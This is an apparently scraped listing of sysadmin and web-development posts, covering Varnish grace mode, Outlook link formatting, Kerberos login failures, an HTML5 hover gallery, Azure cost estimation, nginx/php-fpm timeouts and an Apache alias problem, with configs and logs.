        <script type="text/javascript">
        //<![CDATA[
        var urlSkinsite='http://www.dancemidisamples.com/skin/frontend/em0040/default/';
        //]]>
        </script>
        <!--[if lt IE 7]>
        <script type="text/javascript">
        //<![CDATA[
        var BLANK_URL = 'http://www.dancemidisamples.com/js/blank.html';
        var BLANK_IMG = 'http://www.dancemidisamples.com/js/spacer.gif';
        //]]>
        </script>
        <![endif]-->

    Does anyone have any ideas? People have told me it's my DNS, but it has a 49ms response rate according to http://www.webpagetest.org/result/120906_78_ANK/1/details/cached/ We are hosted with Rackspace, so I don't see how it could be the server. It's a dedicated server, not cloud hosted.


  • Let varnish send old data from cache while it's fetching a new one?

    - by mark
    I'm caching dynamically generated pages (PHP-FPM, NGINX) and have varnish in front of them; this works very well. However, once the cache timeout is reached, I see this:

        1. new client requests page
        2. varnish recognizes the cache timeout
        3. client waits
        4. varnish fetches new page from backend
        5. varnish delivers new page to the client (and has the page cached, too, for the next request, which gets it instantly)

    What I would like to do is:

        1. client requests page
        2. varnish recognizes the timeout
        3. varnish delivers old page to the client
        4. varnish fetches new page from backend and puts it into the cache

    In my case it's not a site where outdated information is such a big problem, especially not when we're talking about a cache timeout of a few minutes. However, I don't want to punish users by making them wait in line; I'd rather deliver something immediately. Is that possible in some way? To illustrate, here's a sample output of running siege for 5 minutes against my server, which was configured to cache for one minute:

        HTTP/1.1,200, 1.97, 12710,/,1,2013-06-24 00:21:06
        ...
        HTTP/1.1,200, 1.88, 12710,/,1,2013-06-24 00:21:20
        ...
        HTTP/1.1,200, 1.93, 12710,/,1,2013-06-24 00:22:08
        ...
        HTTP/1.1,200, 1.89, 12710,/,1,2013-06-24 00:22:22
        ...
        HTTP/1.1,200, 1.94, 12710,/,1,2013-06-24 00:23:10
        ...
        HTTP/1.1,200, 1.91, 12709,/,1,2013-06-24 00:23:23
        ...
        HTTP/1.1,200, 1.93, 12710,/,1,2013-06-24 00:24:12
        ...

    I left out the hundreds of requests completing in 0.02 seconds or so. But it still concerns me that there are going to be users having to wait almost 2 seconds for their raw HTML. Can't we do any better here? (I came across "Varnish send while cache"; it sounded similar, but is not exactly what I'm trying to do.)
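    What's being described matches Varnish's "grace mode". A hedged VCL sketch for Varnish 3.x (the timings are illustrative, and the subroutine names differ in Varnish 4+):

        sub vcl_recv {
            # be willing to serve objects up to 10 minutes past their TTL
            set req.grace = 10m;
        }

        sub vcl_fetch {
            # keep expired objects around so they can be served during grace
            set beresp.grace = 10m;
        }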


  • Mac Outlook showing all links in smart quotes?

    - by user2727128
    I was given the task of fixing my friend's email today and really don't know what the problem is. When an email is sent from his laptop (a Mac) from Outlook, the email address link in the signature shows exactly like this: [email protected]<mailto:[email protected]>. Additionally, the website link displays like this: www.website.com<http://www.website.com>. And lastly, the image comes through as cid:randomstringofnumbers. When I sent him an email and he sent one back, it converted my signature to the same weird formatting. Plus, even in the header where it shows our emails, they display the same way: [email protected]<mailto:[email protected]>. And the weirdest thing is that this problem seems to be "compounding": when I scroll down to the last, most recent email in the thread I see this:

        www.website.com<http://www.website.com>

    the next email shows this:

        www.website.com<http://www.website.com><http://www.website.com>

    and the next this:

        www.website.com<http://www.website.com><http://www.website.com><http://www.website.com>

    This is happening to the email addresses too, everywhere. I'm thinking this might have something to do with smart quotes and the auto formatting, but I'm not sure. Could this be the problem? And if so, how do I fix it?


  • TGT validation fails, but only for one user

    - by wzzrd
    I'm seeing the weirdest thing here. I have a couple of RHEL 3, 4 and 5 machines that validate user credentials through Kerberos with an Active Directory domain controller as their KDC. This works for all of my users, save one. There is one account that is unable to log into RHEL 3 Linux machines and generates the following errors there:

        May 31 13:53:19 mybox sshd(pam_unix)[7186]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.0.1 user=user
        May 31 13:53:20 mybox sshd[7186]: pam_krb5: TGT verification failed for `user'
        May 31 13:53:20 mybox sshd[7186]: pam_krb5: authentication fails for `user'

    Other accounts, like my own, are fine:

        May 31 17:25:30 mybox sshd(pam_unix)[12913]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.0.1 user=myuser
        May 31 17:25:31 mybox sshd[12913]: pam_krb5: TGT for myuser successfully verified
        May 31 17:25:31 mybox sshd[12913]: pam_krb5: authentication succeeds for `myuser'
        May 31 17:25:31 mybox sshd(pam_unix)[12915]: session opened for user myuser by (uid=0)

    As you can see, TGT validation fails. This only happens for this specific account, not for any other. The failing user account's password has been reset and I inspected both user objects in Active Directory, but I see nothing out of the ordinary. If I have the failing user account log into a RHEL 4 or 5 box, there is no problem, so it must be RHEL 3 specific, but the fact that only one account suffers from this eludes me. Maybe someone has seen this before?
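    A hedged way to take sshd out of the picture while comparing the two accounts (standard MIT Kerberos client tools assumed; TGT verification also depends on the host keytab, so the host principal is worth checking):

        kinit user          # obtain a TGT for the failing account directly
        klist -e            # compare ticket encryption types with a working account
        kvno host/mybox     # confirm the host service principal resolves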


  • Creating a multi-column rollover image gallery with HTML 5

    - by nikolaosk
    I know it has been a while since I blogged about HTML 5. I have two posts in this blog about HTML 5; you can find them here and here. I am creating a small content website (only text, images and a contact form) for a friend of mine. He wanted to create a rollover gallery. The whole concept is that we have some small thumbnails on a page; the user hovers over them and they appear enlarged in a designated container/placeholder on the page. I try to avoid Javascript when applying effects on a web page, and that is what I will be doing in this post. Well, some people will say that HTML 5 is not supported in all browsers. That is true, but most of the modern browsers support most of its recommendations. For people who still use IE6, some hacks must be devised. To be totally honest, I cannot understand why anyone at this day and time is using IE 6.0. That really is beyond me. The point of having a web browser is to be able to ENJOY the great experience that the WEB offers today. Two very nice sites that show you what features and specifications are implemented by various browsers and their versions are http://caniuse.com/ and http://html5test.com/. At this time, Chrome seems to support most of the HTML 5 specifications. Another excellent way to find out if the browser supports HTML 5 and CSS 3 features is to use the lightweight Javascript library Modernizr. In this hands-on example I will be using Expression Web 4.0. This application is not a free application, and you can use any HTML editor you like; for example, Visual Studio 2012 Express edition, which you can download here. In order to be absolutely clear, this is not (and could not be) a detailed tutorial on HTML 5. There are other great resources for that: navigate to the excellent interactive tutorials of W3Schools, and another excellent resource is HTML 5 Doctor. For the people who are not convinced yet that they should invest time and resources in becoming experts on HTML 5, I should point out that HTML 5 websites will be ranked higher than others. Search engines will be able to better locate the content of our site and judge its relevance/importance, since it is using semantic tags. Let's move now to the actual hands-on example. In this case (since I am a mad Liverpool supporter) I will create a rollover image gallery of Liverpool F.C. legends. I create a folder on my desktop.
    I name it Liverpool Gallery. Then I create two subfolders in it, large-images (I place the large images in there) and thumbs (I place the small images in there). Then I create an empty .html file called LiverpoolLegends.html and an empty .css file called style.css. Please have a look at the HTML markup that I typed in my fancy editor package below:

        <!doctype html>
        <html lang="en">
        <head>
        <title>Liverpool Legends Gallery</title>
        <meta charset="utf-8">
        <link rel="stylesheet" type="text/css" href="style.css">
        </head>
        <body>
        <header>
        <h1>A page dedicated to Liverpool Legends</h1>
        <h2>Do hover over the images with the mouse to see the full picture</h2>
        </header>
        <ul id="column1">
        <li><a href="#"><img src="thumbs/john-barnes.jpg" alt=""><img class="large" src="large-images/john-barnes-large.jpg" alt=""></a></li>
        <li><a href="#"><img src="thumbs/ian-rush.jpg" alt=""><img class="large" src="large-images/ian-rush-large.jpg" alt=""></a></li>
        <li><a href="#"><img src="thumbs/graeme-souness.jpg" alt=""><img class="large" src="large-images/graeme-souness-large.jpg" alt=""></a></li>
        </ul>
        <ul id="column2">
        <li><a href="#"><img src="thumbs/steven-gerrard.jpg" alt=""><img class="large" src="large-images/steven-gerrard-large.jpg" alt=""></a></li>
        <li><a href="#"><img src="thumbs/kenny-dalglish.jpg" alt=""><img class="large" src="large-images/kenny-dalglish-large.jpg" alt=""></a></li>
        <li><a href="#"><img src="thumbs/robbie-fowler.jpg" alt=""><img class="large" src="large-images/robbie-fowler-large.jpg" alt=""></a></li>
        </ul>
        <ul id="column3">
        <li><a href="#"><img src="thumbs/alan-hansen.jpg" alt=""><img class="large" src="large-images/alan-hansen-large.jpg" alt=""></a></li>
        <li><a href="#"><img src="thumbs/michael-owen.jpg" alt=""><img class="large" src="large-images/michael-owen-large.jpg" alt=""></a></li>
        </ul>
        </body>
        </html>

    It is very easy to follow the markup. Please have a look at the new doctype and the new semantic tag <header>.
    I have 3 columns and I place my images in there. There is a class called "large". I will use this class in my CSS code to hide the large image when the mouse is not hovering over an image. Make sure you validate your HTML 5 page in the validator found here. Have a look at the CSS code below that makes it all happen:

        img { border: none; }

        #column1 { position: absolute; top: 30; left: 100; }
        li { margin: 15px; list-style-type: none; }
        #column1 a img.large { position: absolute; top: 0; left: 700px; visibility: hidden; }
        #column1 a:hover { background: white; }
        #column1 a:hover img.large { visibility: visible; }

        #column2 { position: absolute; top: 30; left: 195px; }
        li { margin: 5px; list-style-type: none; }
        #column2 a img.large { position: absolute; top: 0; left: 510px; margin-left: 0; visibility: hidden; }
        #column2 a:hover { background: white; }
        #column2 a:hover img.large { visibility: visible; }

        #column3 { position: absolute; top: 30; left: 400px; width: 108px; }
        li { margin: 5px; list-style-type: none; }
        #column3 a img.large { width: 260px; height: 260px; position: absolute; top: 0; left: 315px; margin-left: 0; visibility: hidden; }
        #column3 a:hover { background: white; }
        #column3 a:hover img.large { visibility: visible; }

    In the first line of the CSS code I set the images to have no border. Then I place the first column on the page and remove the bullets from the list elements. Then I use the large CSS class to create a position for the large image and hide it. Finally, when the hover event takes place, I make the image visible. I repeat the process for the next two columns. I have tested the page with IE 10 and the latest versions of Opera, Chrome and Firefox. Feel free to style your HTML 5 gallery any way you want through the magic of CSS. I did not bother adding background colors and borders because that was beyond the scope of this post. Hope it helps!!!!


  • Developing a Cost Model for Cloud Applications

    - by BuckWoody
    Note - please pay attention to the date of this post. As much as I attempt to make the information below accurate, the nature of distributed computing means that components, units and pricing will change over time. The definitive costs for Microsoft Windows Azure and SQL Azure are located here, and are more accurate than anything you will see in this post: http://www.microsoft.com/windowsazure/offers/

    When writing software that is run on a Platform-as-a-Service (PaaS) offering like Windows Azure / SQL Azure, one of the questions you must answer is how much the system will cost. I will not discuss the comparisons between on-premise costs (which are nigh impossible to calculate accurately) versus cloud costs, but instead focus on creating a general model for estimating costs for a given application. You should be aware that there are (at this writing) two billing mechanisms for Windows and SQL Azure: "Pay-as-you-go" or consumption, and "Subscription" or commitment. Conceptually, you can consider the former a pay-as-you-go cell phone plan, where you pay by the unit used (at a slightly higher rate), and the latter a standard cell phone plan where you commit to a contract and thus pay lower rates. In this post I'll stick with the pay-as-you-go mechanism for simplicity, which should be the maximum cost you would pay. From there you may be able to get a lower cost if you use the other mechanism. In any case, the model you create should hold.

    Developing a good cost model is essential. As a developer or architect, you'll most certainly be asked how much something will cost, and you need to have a reliable way to estimate that. Businesses and organizations have been used to paying for servers, software licenses, and other infrastructure as an up-front cost, and power, people to maintain the systems and so on as an ongoing (and sometimes unfactored) cost. When presented with a new paradigm like distributed computing, they may not understand the true cost/value proposition, and that's where the architect and developer can guide the conversation to make a choice based on features of the application versus the true costs.

    The two big buckets of use-types for these applications are customer-based and steady-state. In the customer-based use type, each successful use of the program results in a sale or income for your organization. Perhaps you've written an application that provides the spot price of foo, and your customer pays for the use of that application. In that case, once you've estimated your cost for a successful traversal of the application, you can build that into the price you charge the user. It's a standard restaurant model, where the price of the meal is determined by the cost of making it, plus any profit you can make. In the second use-type, the application will be used by a more-or-less constant number of processes or users and no direct revenue is attached to the system. A typical example is a customer-tracking system used by the employees within your company. In this case, the cost model is often created "in reverse" - meaning that you pilot the application, monitor the use (and costs) and that cost is held steady. This is where the comparison with an on-premise system becomes necessary, even though it is more difficult to estimate those on-premise true costs. For instance, do you know exactly how much the air conditioning, or the team of system administrators, costs the business? This may sound trivial, but that, along with the insurance for the building, the wiring, and every other part of the system, is in fact a cost to the business.

    There are three primary methods that I've been successful with in estimating the cost. None are perfect; all are demand-driven. The general process is to lay out a matrix of components, units, and cost per unit, and then multiply that by the usage of the system, based on which components you use in the program. That sounds a bit simplistic, but using those metrics in a calculation becomes more detailed. In all of the methods that follow, you need to know your application. The components for a PaaS include computing instances, storage, transactions, bandwidth and, in the case of SQL Azure, database size. In most cases, architects start with the first model and progress through the other methods to gain accuracy.

    Simple Estimation
    The simplest way to calculate costs is to architect the application (even in UML or on paper, no coding involved) and then estimate which of the components you'll use and how much of each will be used. Microsoft provides two tools to do this. One is a simple slider application located here: http://www.microsoft.com/windowsazure/pricing-calculator/ The other is a tool you download to create a "Return on Investment" (ROI) spreadsheet, which has the advantage of leading you through various questions to estimate what you plan to use, located here: https://roianalyst.alinean.com/msft/AutoLogin.do?d=176318219048082115 You can also just create a spreadsheet yourself with a structure like this:

        Program Element | Azure Component | Unit of Measure | Cost Per Unit | Estimated Use of Component | Total Cost Per Component | Cumulative Cost

    Of course, the consideration with this model is that it is difficult to predict a system that is not running or hasn't even been developed. Which brings us to the next model type.

    Measure and Project
    A more accurate model is to actually write the code for the application using the Software Development Kit (SDK), which can run entirely disconnected from Azure. The code should be instrumented to estimate the use of the application components, logging to a local file on the development system. A series of unit and integration tests should be run, which will create load on the test system. You can use standard development concepts to track this usage, and even use Windows Performance Monitor counters. The best place to start with this method is to use the Windows Azure Diagnostics subsystem in your code, which you can read more about here: http://blogs.msdn.com/b/sumitm/archive/2009/11/18/introducing-windows-azure-diagnostics.aspx This set of API's greatly simplifies tracking the application, and in fact you can use this information for more than just a cost model. After you have the tracking logs, you can plug the numbers into any of the tools above, which should give a representative cost or in some cases a unit cost. The consideration with this model is that the SDK fabric is not a one-to-one comparison with performance on the actual Windows Azure fabric. Those differences are usually smaller, but they do need to be considered. Also, you may not be able to accurately predict the load on the system, which might lead to an architectural change, which changes the model. This leads us to the next, most accurate method for a cost model.

    Sample and Estimate
    Using standard statistical and other predictive math, once the application is deployed you will get a bill each month from Microsoft for your Azure usage. The bill is quite detailed, and you can export the data from it to do analysis, and, using methods like regression and so on, project into the future what the costs will be. I normally advise that the architect also extrapolate a unit cost from those metrics as well. This is the information that should be reported back to the executives that pay the bills: the past cost, future projected costs, and unit cost "per click" or "per transaction", as your case warrants. The challenge here is in the model itself - statistical methods are not foolproof, and the size of the sample is key (in this case I recommend the entire population, not a smaller sample).

    References and Tools

    Articles:
    http://blogs.msdn.com/b/patrick_butler_monterde/archive/2010/02/10/windows-azure-billing-overview.aspx
    http://technet.microsoft.com/en-us/magazine/gg213848.aspx
    http://blog.codingoutloud.com/2011/06/05/azure-faq-how-much-will-it-cost-me-to-run-my-application-on-windows-azure/
    http://blogs.msdn.com/b/johnalioto/archive/2010/08/25/10054193.aspx
    http://geekswithblogs.net/iupdateable/archive/2010/02/08/qampa-how-can-i-calculate-the-tco-and-roi-when.aspx

    Other Tools:
    http://cloud-assessment.com/
    http://communities.quest.com/community/cloud_tools


  • Nginx + php-fpm "504 Gateway Time-out" error with almost zero load (on a test-server)

    - by rahul286
    After debugging for 6 hours - I am giving this up :| We have nginx+php-fpm+mysql in a LAN with almost 100 WordPress installs (created and used by different designers/developers, all working on a test WordPress setup). We have been using nginx without any issues for a long time. Today, all of a sudden, nginx started returning "504 Gateway Time-out" out of the blue... I checked the nginx error log for a virtual host:

        2010/09/06 21:24:24 [error] 12909#0: *349 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 21:25:11 [error] 12909#0: *349 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 21:25:11 [error] 12909#0: *443 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 21:25:12 [error] 12909#0: *443 connect() failed (111: Connection refused) while connecting to upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 22:08:32 [error] 12909#0: *1025 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 22:09:33 [error] 12909#0: *1025 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 22:09:40 [error] 12909#0: *1064 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 22:09:40 [error] 12909#0: *1064 connect() failed (111: Connection refused) while connecting to upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 22:24:44 [error] 12909#0: *1313 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"
        2010/09/06 22:24:53 [error] 12909#0: *1313 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info"

    As I run php-fpm on port 9000 via TCP mode, I ran "netstat | grep 9000" and noticed something unusual... (pasting partial output here for ease of reading):

        tcp    9    0 localhost:9000    localhost:36094    CLOSE_WAIT   14269/php5-fpm
        tcp    0    0 localhost:46664   localhost:9000     FIN_WAIT2    -
        tcp 1257    0 localhost:9000    localhost:36135    CLOSE_WAIT   -
        tcp 1257    0 localhost:9000    localhost:36125    CLOSE_WAIT   -
        tcp    9    0 localhost:9000    localhost:36102    CLOSE_WAIT   14268/php5-fpm
        tcp    0    0 localhost:46662   localhost:9000     FIN_WAIT2    -
        tcp  745    0 localhost:9000    localhost:46644    CLOSE_WAIT   -
        tcp    0    0 localhost:46658   localhost:9000     FIN_WAIT2    -
        tcp 1265    0 localhost:9000    localhost:46607    CLOSE_WAIT   -
        tcp    0    0 localhost:46672   localhost:9000     ESTABLISHED  12909/nginx: worker
        tcp 1257    0 localhost:9000    localhost:36119    CLOSE_WAIT   -
        tcp 1265    0 localhost:9000    localhost:46613    CLOSE_WAIT   -
        tcp    0    0 localhost:46646   localhost:9000     FIN_WAIT2    -
        tcp 1257    0 localhost:9000    localhost:36137    CLOSE_WAIT   -
        tcp    0    0 localhost:46670   localhost:9000     ESTABLISHED  12909/nginx: worker
        tcp 1265    0 localhost:9000    localhost:46619    CLOSE_WAIT   -
        tcp 1336    0 localhost:9000    localhost:46668    ESTABLISHED  -
        tcp    0    0 localhost:46648   localhost:9000     FIN_WAIT2    -
        tcp 1336    0 localhost:9000    localhost:46670    ESTABLISHED  -
        tcp    9    0 localhost:9000    localhost:36108    CLOSE_WAIT   14274/php5-fpm
        tcp 1336    0 localhost:9000    localhost:46684    ESTABLISHED  -
        tcp    0    0 localhost:46674   localhost:9000     ESTABLISHED  12909/nginx: worker
        tcp 1336    0 localhost:9000    localhost:46666    ESTABLISHED  -
        tcp 1257    0 localhost:9000    localhost:46648    CLOSE_WAIT   -
        tcp 1336    0 localhost:9000    localhost:46678    ESTABLISHED  -
        tcp    0    0 localhost:46668   localhost:9000     ESTABLISHED  12909/nginx: wo

    There are plenty of "CLOSE_WAIT" & "FIN_WAIT2" pairs, as highlighted below (from the above output):

        tcp 1337    0 localhost:9000    localhost:46680    CLOSE_WAIT   -
        tcp    0    0 localhost:46680   localhost:9000     FIN_WAIT2    -

    Please note port 46680 above. I enabled the MySQL slow query log, but that didn't help. As of now, restarting php5-fpm every minute via a cronjob (see the command below) keeps everything running "smoothly", but I hate patchwork and want to solve this...

        1 * * * * service php5-fpm restart > /dev/null

    I searched extensively on Google - got no help. As mentioned, this is a test server in a LAN; the CPU load never crossed 0.10 and memory usage is also below 25% (the system has 2GB RAM and ubuntu-server installed). So if you find it time-consuming to help me out, please at least drop a hint. Thanks in advance for help. -Rahul (note - this is a repost of http://forum.nginx.org/read.php?11,127694) Update: I found the answer, which is posted below.
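    Since the asker notes the answer was eventually found and posted separately, this is only a hedged aside: one commonly suggested mitigation for CLOSE_WAIT pileups on a TCP-mode pool is moving PHP-FPM onto a unix socket, which removes the localhost TCP state machine entirely. In the pool config (paths illustrative):

        ; /etc/php5/fpm/pool.d/www.conf
        listen = /var/run/php5-fpm.sock

    and in the nginx virtual host:

        # point FastCGI at the socket instead of 127.0.0.1:9000
        fastcgi_pass unix:/var/run/php5-fpm.sock;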


  • Create an Alias Directory inside a Virtual Host

    - by Praveen Kumar
    First, let me say I asked this question on Stack Overflow and thought I could get more replies here. I checked here, here, here, here, here, and here before asking this question. I guess my search skills are weak. I am using WampServer version 2.2e. My need is this: I want a virtual path inside a virtual host. Let me show the hosts that I have.

    Primary Virtual Host (localhost):

        NameVirtualHost *:80
        <VirtualHost *:80>
            ServerName localhost
            DocumentRoot "C:/Wamp/www"
        </VirtualHost>

    My Apps Virtual Host:

        <VirtualHost *:80>
            ServerName apps.ptrl
            DocumentRoot "C:/Wamp/vhosts/ptrl/apps"
            ErrorLog "logs/apps-ptrl-error.log"
            CustomLog "logs/apps-ptrl-access.log" common
            <Directory "C:/Wamp/vhosts/ptrl/apps">
                allow from all
                order allow,deny
                AllowOverride All
            </Directory>
            DirectoryIndex index.html index.htm index.php
        </VirtualHost>

    My Blog Virtual Host:

        <VirtualHost *:80>
            ServerName blog.praveen-kumar.ptrl
            DocumentRoot "C:/Wamp/vhosts/ptrl/praveen-kumar/blog"
            ErrorLog "logs/praveen-kumar-ptrl-error.log"
            CustomLog "logs/praveen-kumar-ptrl-access.log" common
            <Directory "C:/Wamp/vhosts/ptrl/praveen-kumar/blog">
                allow from all
                order allow,deny
                AllowOverride All
            </Directory>
            DirectoryIndex index.html index.htm index.php
        </VirtualHost>

    My requirement now is that http://apps.ptrl/blog/ and http://blog.praveen-kumar.ptrl/ should be the same directory. One thing I thought of was moving the blog folder inside the apps folder, but it is connected with Git and other stuff is in there, so it is not possible to move the folder. So I thought of creating an alias in the VirtualHost this way:

        <VirtualHost *:80>
            ServerName apps.ptrl
            DocumentRoot "C:/Wamp/vhosts/ptrl/apps"
            ErrorLog "logs/apps-ptrl-error.log"
            CustomLog "logs/apps-ptrl-access.log" common
            <Directory "C:/Wamp/vhosts/ptrl/apps">
                allow from all
                order allow,deny
                AllowOverride All
            </Directory>
            DirectoryIndex index.html index.htm index.php
            # The alias to the blog!
            Alias /blog "C:/Wamp/vhosts/ptrl/praveen-kumar/blog"
            <Directory "C:/Wamp/vhosts/ptrl/praveen-kumar/blog">
                allow from all
                order allow,deny
                AllowOverride All
            </Directory>
        </VirtualHost>

    But when I tried to access http://apps.ptrl/blog, I got an Error 403 Forbidden page. Am I doing the right thing? If you need to look at the access log and error log, they are here:

        # Access Log
        127.0.0.1 - - [14/Oct/2012:09:53:11 +0530] "GET /blog HTTP/1.1" 403 206
        127.0.0.1 - - [14/Oct/2012:09:53:11 +0530] "GET /favicon.ico HTTP/1.1" 404 209
        127.0.0.1 - - [14/Oct/2012:09:53:53 +0530] "GET / HTTP/1.1" 200 6935
        127.0.0.1 - - [14/Oct/2012:09:53:53 +0530] "GET /app/blog/thumb.png HTTP/1.1" 404 216

        # Error Log
        [Sun Oct 14 09:53:11 2012] [error] [client 127.0.0.1] client denied by server configuration: C:/Wamp/vhosts/ptrl/praveen-kumar/blog
        [Sun Oct 14 09:53:11 2012] [error] [client 127.0.0.1] File does not exist: C:/Wamp/vhosts/ptrl/apps/favicon.ico
        [Sun Oct 14 09:53:53 2012] [error] [client 127.0.0.1] File does not exist: C:/Wamp/vhosts/ptrl/apps/app/blog, referer: http://apps.ptrl/

    Waiting eagerly for some help. I am ready to provide more info if needed.

    Update #1: Changed the VirtualHost so the Alias and its Directory block come first:

        <VirtualHost *:80>
            ServerName apps.ptrl
            DocumentRoot "C:/Wamp/vhosts/ptrl/apps"
            ErrorLog "logs/apps-ptrl-error.log"
            CustomLog "logs/apps-ptrl-access.log" common
            # The alias to the blog!
            Alias /blog "C:/Wamp/vhosts/ptrl/praveen-kumar/blog"
            <Directory "C:/Wamp/vhosts/ptrl/praveen-kumar/blog">
                allow from all
                order allow,deny
                AllowOverride All
            </Directory>
            <Directory "C:/Wamp/vhosts/ptrl/apps">
                allow from all
                order allow,deny
                AllowOverride All
            </Directory>
            DirectoryIndex index.html index.htm index.php
        </VirtualHost>

    The issue now: I am able to access the site, and the physical links are working, i.e. I am able to open http://apps.ptrl/blog/index.php but not http://apps.ptrl/blog/view-1.ptf, which gets translated to http://apps.ptrl/blog/index.php?page=view&id=1. Any solutions?
